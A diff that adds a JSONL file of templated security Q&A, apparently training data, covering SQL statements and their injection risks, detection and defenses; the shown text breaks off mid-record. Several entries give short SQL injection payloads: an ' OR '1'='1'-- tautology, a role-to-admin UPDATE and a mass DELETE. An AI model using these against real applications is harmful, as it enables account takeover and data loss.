diff --git "a/data/phase3c/databases_phase3c.jsonl" "b/data/phase3c/databases_phase3c.jsonl" new file mode 100644--- /dev/null +++ "b/data/phase3c/databases_phase3c.jsonl" 
@@ -0,0 +1,475 @@ +{"id": "trtp-15c80db8967e", "instruction": "What do security professionals need to know about SQL SELECT Statement?", "output": "The SELECT statement retrieves data from database tables. It's the most common SQL operation and the primary vector for SQL injection attacks. Understanding SELECT syntax is essential for both exploiting and defending against injection vulnerabilities.\n\nSecurity Relevance: SELECT statements are the foundation of data extraction attacks. SQL injection typically targets SELECT queries to extract unauthorized data. Understanding how SELECT works enables crafting injection payloads and implementing proper defenses.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-select-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.064231Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.064267Z", "updated_at": "2025-12-17T19:35:42.064267Z"} +{"id": "trtp-10fa151f5839", "instruction": "What are the main parts of SQL SELECT Statement that security teams should understand?", "output": "SQL SELECT Statement consists of the following key components:\n\n- Column selection (SELECT columns)\n- Table specification (FROM table)\n- Filtering (WHERE clause)\n- Sorting (ORDER BY clause)\n- Limiting results (LIMIT/TOP)\n- Aggregation (GROUP BY, HAVING)", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-select-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.064231Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": 
null, "flags": []}, "created_at": "2025-12-17T19:35:42.064295Z", "updated_at": "2025-12-17T19:35:42.064295Z"} +{"id": "trtp-f99f5f667fcd", "instruction": "From a security perspective, why should defenders understand SQL SELECT Statement?", "output": "SELECT statements are the foundation of data extraction attacks. SQL injection typically targets SELECT queries to extract unauthorized data. Understanding how SELECT works enables crafting injection payloads and implementing proper defenses.\n\nCommon attack vectors include:\n- UNION-based injection to append malicious SELECT\n- WHERE clause manipulation for data extraction\n- ORDER BY injection for column enumeration\n- Subquery injection in SELECT clause", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-select-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.064231Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.064311Z", "updated_at": "2025-12-17T19:35:42.064311Z"} +{"id": "trtp-4f3c98f88b87", "instruction": "What attacks exploit SQL SELECT Statement?", "output": "Attack techniques involving SQL SELECT Statement:\n\n- UNION-based injection to append malicious SELECT\n- WHERE clause manipulation for data extraction\n- ORDER BY injection for column enumeration\n- Subquery injection in SELECT clause\n\nDefenders can detect these attacks by:\n- Anomalous SELECT patterns in query logs\n- Unexpected column access in audit trails\n- Query complexity anomalies", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-select-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.064231Z", 
"transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.064326Z", "updated_at": "2025-12-17T19:35:42.064326Z"} +{"id": "trtp-d71fb3fc92fe", "instruction": "How can security teams detect attacks related to SQL SELECT Statement?", "output": "Methods for detecting SQL SELECT Statement attacks or anomalies:\n\n- Anomalous SELECT patterns in query logs\n- Unexpected column access in audit trails\n- Query complexity anomalies\n- Response size spikes indicating data extraction", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-select-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.064231Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.064339Z", "updated_at": "2025-12-17T19:35:42.064339Z"} +{"id": "trtp-9d3de6c03b3f", "instruction": "What security controls mitigate SQL SELECT Statement risks?", "output": "Security controls and preventive measures for SQL SELECT Statement:\n\n- Parameterized queries for all user input\n- Column-level permissions restricting data access\n- Query complexity limits\n- Row-level security policies\n\nSELECT statements are the foundation of data extraction attacks. SQL injection typically targets SELECT queries to extract unauthorized data. 
Understanding how SELECT works enables crafting injection payloads and implementing proper defenses.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-select-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.064231Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.064351Z", "updated_at": "2025-12-17T19:35:42.064351Z"} +{"id": "trtp-398f8db30ec2", "instruction": "Provide a code example for SQL SELECT Statement.", "output": "Example of SQL SELECT Statement:\n\n```sql\nSELECT username, email FROM users WHERE role = 'admin' ORDER BY created_at DESC LIMIT 10;\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-select-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.064231Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.064361Z", "updated_at": "2025-12-17T19:35:42.064361Z"} +{"id": "trtp-c18db4171804", "instruction": "What is SQL INSERT Statement and why is it important for database security?", "output": "INSERT statements add new rows to database tables. SQL injection in INSERT contexts can create unauthorized accounts, inject malicious data, or exploit stored XSS through database-stored values that are later rendered.\n\nSecurity Relevance: INSERT injection enables attackers to create backdoor accounts, inject malicious payloads stored for later execution, or corrupt data integrity. 
Unlike SELECT injection, INSERT attacks modify database state.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-insert-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.066287Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.066316Z", "updated_at": "2025-12-17T19:35:42.066316Z"} +{"id": "trtp-8d89fd7fbea4", "instruction": "Describe the technical aspects of SQL INSERT Statement.", "output": "SQL INSERT Statement consists of the following key components:\n\n- Target table specification\n- Column list\n- VALUES clause\n- INSERT...SELECT combination\n- Multi-row INSERT\n- ON DUPLICATE KEY handling", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-insert-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.066287Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.066338Z", "updated_at": "2025-12-17T19:35:42.066338Z"} +{"id": "trtp-aaca5c5a79f4", "instruction": "What security risks are associated with SQL INSERT Statement?", "output": "INSERT injection enables attackers to create backdoor accounts, inject malicious payloads stored for later execution, or corrupt data integrity. 
Unlike SELECT injection, INSERT attacks modify database state.\n\nCommon attack vectors include:\n- Account creation with elevated privileges\n- Data injection for stored XSS\n- INSERT...SELECT for data duplication\n- Bypassing validation through INSERT manipulation", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-insert-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.066287Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.066353Z", "updated_at": "2025-12-17T19:35:42.066353Z"} +{"id": "trtp-16505b8785ab", "instruction": "What are common attack techniques involving SQL INSERT Statement?", "output": "Attack techniques involving SQL INSERT Statement:\n\n- Account creation with elevated privileges\n- Data injection for stored XSS\n- INSERT...SELECT for data duplication\n- Bypassing validation through INSERT manipulation\n\nDefenders can detect these attacks by:\n- Unexpected INSERT operations in audit logs\n- Account creation anomalies\n- Data integrity monitoring", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-insert-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.066287Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.066368Z", "updated_at": "2025-12-17T19:35:42.066368Z"} +{"id": "trtp-4f9e84871d33", "instruction": "How do you detect exploitation of SQL INSERT Statement?", "output": "Methods for detecting SQL INSERT Statement attacks or anomalies:\n\n- Unexpected INSERT 
operations in audit logs\n- Account creation anomalies\n- Data integrity monitoring\n- Privilege assignment tracking", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-insert-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.066287Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.066380Z", "updated_at": "2025-12-17T19:35:42.066380Z"} +{"id": "trtp-2b43463b4e49", "instruction": "What are best practices for preventing SQL INSERT Statement?", "output": "Security controls and preventive measures for SQL INSERT Statement:\n\n- Parameterized queries for INSERT operations\n- Application-level validation before INSERT\n- Database triggers for INSERT auditing\n- Referential integrity constraints\n\nINSERT injection enables attackers to create backdoor accounts, inject malicious payloads stored for later execution, or corrupt data integrity. 
Unlike SELECT injection, INSERT attacks modify database state.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-insert-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.066287Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.066392Z", "updated_at": "2025-12-17T19:35:42.066392Z"} +{"id": "trtp-358b0ea16815", "instruction": "What does SQL INSERT Statement look like in SQL?", "output": "Example of SQL INSERT Statement:\n\n```sql\nINSERT INTO users (username, password, role) VALUES ('newuser', 'hashed_pw', 'admin');\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-insert-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.066287Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.066403Z", "updated_at": "2025-12-17T19:35:42.066403Z"} +{"id": "trtp-151d3f5c866f", "instruction": "How does SQL UPDATE Statement work and what are its security implications?", "output": "UPDATE modifies existing rows in database tables. Injection in UPDATE contexts can escalate privileges, modify critical data, or corrupt database integrity. UPDATE without WHERE affects all rows - a dangerous condition.\n\nSecurity Relevance: UPDATE injection enables privilege escalation (changing role to admin), data manipulation (modifying prices, balances), or mass data corruption. 
The WHERE clause is critical - missing WHERE updates all rows.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-update-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.068148Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.068178Z", "updated_at": "2025-12-17T19:35:42.068178Z"} +{"id": "trtp-c3eefc664cb0", "instruction": "What elements make up SQL UPDATE Statement?", "output": "SQL UPDATE Statement consists of the following key components:\n\n- Target table specification\n- SET clause for column updates\n- WHERE clause for row selection\n- JOIN in UPDATE (database-specific)\n- Subqueries in SET values", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-update-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.068148Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.068199Z", "updated_at": "2025-12-17T19:35:42.068199Z"} +{"id": "trtp-43eb2172eb0b", "instruction": "How can SQL UPDATE Statement lead to database security incidents?", "output": "UPDATE injection enables privilege escalation (changing role to admin), data manipulation (modifying prices, balances), or mass data corruption. 
The WHERE clause is critical - missing WHERE updates all rows.\n\nCommon attack vectors include:\n- Privilege escalation: UPDATE users SET role='admin' WHERE username='attacker'\n- Password reset manipulation\n- WHERE clause bypass for mass updates\n- SET clause injection for additional modifications", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-update-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.068148Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.068214Z", "updated_at": "2025-12-17T19:35:42.068214Z"} +{"id": "trtp-c14d175063ac", "instruction": "How can adversaries exploit SQL UPDATE Statement?", "output": "Attack techniques involving SQL UPDATE Statement:\n\n- Privilege escalation: UPDATE users SET role='admin' WHERE username='attacker'\n- Password reset manipulation\n- WHERE clause bypass for mass updates\n- SET clause injection for additional modifications\n\nDefenders can detect these attacks by:\n- UPDATE operations on sensitive columns\n- Mass UPDATE detection (high row counts)\n- Privilege change auditing", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-update-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.068148Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.068229Z", "updated_at": "2025-12-17T19:35:42.068229Z"} +{"id": "trtp-20f92d3886c8", "instruction": "How do you detect exploitation of SQL UPDATE Statement?", "output": "Methods for detecting SQL UPDATE 
Statement attacks or anomalies:\n\n- UPDATE operations on sensitive columns\n- Mass UPDATE detection (high row counts)\n- Privilege change auditing\n- UPDATE frequency anomalies", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-update-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.068148Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.068240Z", "updated_at": "2025-12-17T19:35:42.068240Z"} +{"id": "trtp-ad01c660f64e", "instruction": "How can organizations protect against SQL UPDATE Statement?", "output": "Security controls and preventive measures for SQL UPDATE Statement:\n\n- Parameterized queries for UPDATE\n- Require WHERE clause (application logic)\n- Row-level security preventing unauthorized updates\n- Trigger-based change auditing\n\nUPDATE injection enables privilege escalation (changing role to admin), data manipulation (modifying prices, balances), or mass data corruption. 
The WHERE clause is critical - missing WHERE updates all rows.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-update-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.068148Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.068253Z", "updated_at": "2025-12-17T19:35:42.068253Z"} +{"id": "trtp-dbb96b7b7917", "instruction": "What is the syntax for SQL UPDATE Statement?", "output": "Example of SQL UPDATE Statement:\n\n```sql\nUPDATE users SET role = 'admin', password = 'new_hash' WHERE user_id = 42;\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-update-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.068148Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.068263Z", "updated_at": "2025-12-17T19:35:42.068263Z"} +{"id": "trtp-59bd9c28d72f", "instruction": "What is SQL DELETE Statement and why is it important for database security?", "output": "DELETE removes rows from database tables. Injection in DELETE contexts enables data destruction, denial of service through mass deletion, or targeted removal of audit trails. DELETE without WHERE removes all rows.\n\nSecurity Relevance: DELETE injection can destroy data, remove audit evidence, or cause denial of service. Unlike SELECT, DELETE attacks directly impact data availability and integrity. 
Recovery requires backups.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-delete-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.070105Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.070135Z", "updated_at": "2025-12-17T19:35:42.070135Z"} +{"id": "trtp-69480d730035", "instruction": "What are the main parts of SQL DELETE Statement that security teams should understand?", "output": "SQL DELETE Statement consists of the following key components:\n\n- Target table specification\n- WHERE clause for row selection\n- JOIN in DELETE (database-specific)\n- TRUNCATE vs DELETE differences\n- Cascading deletes via foreign keys", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-delete-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.070105Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.070155Z", "updated_at": "2025-12-17T19:35:42.070155Z"} +{"id": "trtp-92c954026e70", "instruction": "From a security perspective, why should defenders understand SQL DELETE Statement?", "output": "DELETE injection can destroy data, remove audit evidence, or cause denial of service. Unlike SELECT, DELETE attacks directly impact data availability and integrity. 
Recovery requires backups.\n\nCommon attack vectors include:\n- Mass deletion: DELETE FROM orders (no WHERE)\n- Audit trail removal\n- Cascading delete exploitation\n- Targeted evidence destruction", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-delete-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.070105Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.070170Z", "updated_at": "2025-12-17T19:35:42.070170Z"} +{"id": "trtp-5e305125decb", "instruction": "How do attackers abuse SQL DELETE Statement?", "output": "Attack techniques involving SQL DELETE Statement:\n\n- Mass deletion: DELETE FROM orders (no WHERE)\n- Audit trail removal\n- Cascading delete exploitation\n- Targeted evidence destruction\n\nDefenders can detect these attacks by:\n- DELETE operations on critical tables\n- Mass DELETE detection\n- Audit log modification attempts", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-delete-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.070105Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.070185Z", "updated_at": "2025-12-17T19:35:42.070185Z"} +{"id": "trtp-1989a91faf5d", "instruction": "What log entries indicate SQL DELETE Statement attacks?", "output": "Methods for detecting SQL DELETE Statement attacks or anomalies:\n\n- DELETE operations on critical tables\n- Mass DELETE detection\n- Audit log modification attempts\n- Unusual DELETE patterns", "category": "detection", 
"team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-delete-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.070105Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.070196Z", "updated_at": "2025-12-17T19:35:42.070196Z"} +{"id": "trtp-92c1831d31bd", "instruction": "What are best practices for preventing SQL DELETE Statement?", "output": "Security controls and preventive measures for SQL DELETE Statement:\n\n- Parameterized queries for DELETE\n- Soft delete patterns (is_deleted flag)\n- Required WHERE clause enforcement\n- Point-in-time recovery capability\n\nDELETE injection can destroy data, remove audit evidence, or cause denial of service. Unlike SELECT, DELETE attacks directly impact data availability and integrity. Recovery requires backups.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-delete-statement", "license": "original", "retrieved_at": "2025-12-17T19:35:42.070105Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.070208Z", "updated_at": "2025-12-17T19:35:42.070208Z"} +{"id": "trtp-2e9b5f65f83e", "instruction": "Describe SQL WHERE Clause and its role in database security.", "output": "The WHERE clause filters rows based on conditions. It's the primary injection point for most SQL injection attacks. WHERE clause logic determines which rows are affected by SELECT, UPDATE, or DELETE operations.\n\nSecurity Relevance: WHERE clause injection is the classic SQL injection vector. 
Attackers modify WHERE logic to bypass authentication, extract data, or affect unintended rows. The ' OR '1'='1' payload exploits WHERE clause boolean logic.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-where-clause", "license": "original", "retrieved_at": "2025-12-17T19:35:42.071749Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.071779Z", "updated_at": "2025-12-17T19:35:42.071779Z"} +{"id": "trtp-ef5327725a3d", "instruction": "What elements make up SQL WHERE Clause?", "output": "SQL WHERE Clause consists of the following key components:\n\n- Comparison operators (=, <>, <, >, <=, >=)\n- Logical operators (AND, OR, NOT)\n- Pattern matching (LIKE, wildcards)\n- NULL handling (IS NULL, IS NOT NULL)\n- IN and NOT IN operators\n- BETWEEN for ranges", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-where-clause", "license": "original", "retrieved_at": "2025-12-17T19:35:42.071749Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.071799Z", "updated_at": "2025-12-17T19:35:42.071799Z"} +{"id": "trtp-9d65833c0a75", "instruction": "Why is SQL WHERE Clause important for database security?", "output": "WHERE clause injection is the classic SQL injection vector. Attackers modify WHERE logic to bypass authentication, extract data, or affect unintended rows. 
The ' OR '1'='1' payload exploits WHERE clause boolean logic.\n\nCommon attack vectors include:\n- Tautology: ' OR '1'='1'--\n- Authentication bypass through WHERE manipulation\n- Comment injection to remove WHERE conditions\n- Boolean-based blind injection", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-where-clause", "license": "original", "retrieved_at": "2025-12-17T19:35:42.071749Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.071814Z", "updated_at": "2025-12-17T19:35:42.071814Z"} +{"id": "trtp-078fbf8c7460", "instruction": "How can adversaries exploit SQL WHERE Clause?", "output": "Attack techniques involving SQL WHERE Clause:\n\n- Tautology: ' OR '1'='1'--\n- Authentication bypass through WHERE manipulation\n- Comment injection to remove WHERE conditions\n- Boolean-based blind injection\n\nDefenders can detect these attacks by:\n- SQL syntax in user input (quotes, OR, AND)\n- Always-true conditions in WHERE clauses\n- Comment sequences in parameters", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-where-clause", "license": "original", "retrieved_at": "2025-12-17T19:35:42.071749Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.071828Z", "updated_at": "2025-12-17T19:35:42.071828Z"} +{"id": "trtp-a8f1decd32a9", "instruction": "What indicators reveal malicious activity involving SQL WHERE Clause?", "output": "Methods for detecting SQL WHERE Clause attacks or anomalies:\n\n- SQL syntax in user input (quotes, OR, AND)\n- 
Always-true conditions in WHERE clauses\n- Comment sequences in parameters\n- Query result set anomalies", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-where-clause", "license": "original", "retrieved_at": "2025-12-17T19:35:42.071749Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.071840Z", "updated_at": "2025-12-17T19:35:42.071840Z"} +{"id": "trtp-95cb118c296e", "instruction": "How do you defend against SQL WHERE Clause attacks?", "output": "Security controls and preventive measures for SQL WHERE Clause:\n\n- Parameterized queries bind values safely\n- Input validation for expected formats\n- Stored procedures with defined parameters\n- Least privilege reducing impact\n\nWHERE clause injection is the classic SQL injection vector. Attackers modify WHERE logic to bypass authentication, extract data, or affect unintended rows. 
The ' OR '1'='1' payload exploits WHERE clause boolean logic.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-where-clause", "license": "original", "retrieved_at": "2025-12-17T19:35:42.071749Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.071852Z", "updated_at": "2025-12-17T19:35:42.071852Z"} +{"id": "trtp-70d33f8ff88a", "instruction": "What does SQL WHERE Clause look like in SQL?", "output": "Example of SQL WHERE Clause:\n\n```sql\nSELECT * FROM products WHERE category = 'Electronics' AND price BETWEEN 100 AND 500;\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-where-clause", "license": "original", "retrieved_at": "2025-12-17T19:35:42.071749Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.071863Z", "updated_at": "2025-12-17T19:35:42.071863Z"} +{"id": "trtp-4826ec86cc66", "instruction": "How does SQL JOIN Operations work and what are its security implications?", "output": "JOIN combines rows from multiple tables based on related columns. Understanding JOINs is crucial for comprehending complex injection attacks that span multiple tables and for analyzing database schemas during exploitation.\n\nSecurity Relevance: JOINs expose relationships between tables. Attackers use JOINs in injection to access data across table boundaries. 
Understanding JOINs helps in both exploitation (extracting related data) and defense (query complexity limits).", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-join-operations", "license": "original", "retrieved_at": "2025-12-17T19:35:42.074185Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.074216Z", "updated_at": "2025-12-17T19:35:42.074216Z"} +{"id": "trtp-2ae59ca901c2", "instruction": "Describe the technical aspects of SQL JOIN Operations.", "output": "SQL JOIN Operations consists of the following key components:\n\n- INNER JOIN (matching rows only)\n- LEFT/RIGHT OUTER JOIN\n- FULL OUTER JOIN\n- CROSS JOIN (Cartesian product)\n- Self-joins\n- Multiple table joins", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-join-operations", "license": "original", "retrieved_at": "2025-12-17T19:35:42.074185Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.074237Z", "updated_at": "2025-12-17T19:35:42.074237Z"} +{"id": "trtp-97f6c368ee23", "instruction": "From a security perspective, why should defenders understand SQL JOIN Operations?", "output": "JOINs expose relationships between tables. Attackers use JOINs in injection to access data across table boundaries. 
Understanding JOINs helps in both exploitation (extracting related data) and defense (query complexity limits).\n\nCommon attack vectors include:\n- JOIN injection to access related tables\n- CROSS JOIN for denial of service (Cartesian explosion)\n- Information disclosure through JOIN results\n- Privilege escalation via JOIN to admin tables", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-join-operations", "license": "original", "retrieved_at": "2025-12-17T19:35:42.074185Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.074252Z", "updated_at": "2025-12-17T19:35:42.074252Z"} +{"id": "trtp-d3e1dbc132be", "instruction": "What are common attack techniques involving SQL JOIN Operations?", "output": "Attack techniques involving SQL JOIN Operations:\n\n- JOIN injection to access related tables\n- CROSS JOIN for denial of service (Cartesian explosion)\n- Information disclosure through JOIN results\n- Privilege escalation via JOIN to admin tables\n\nDefenders can 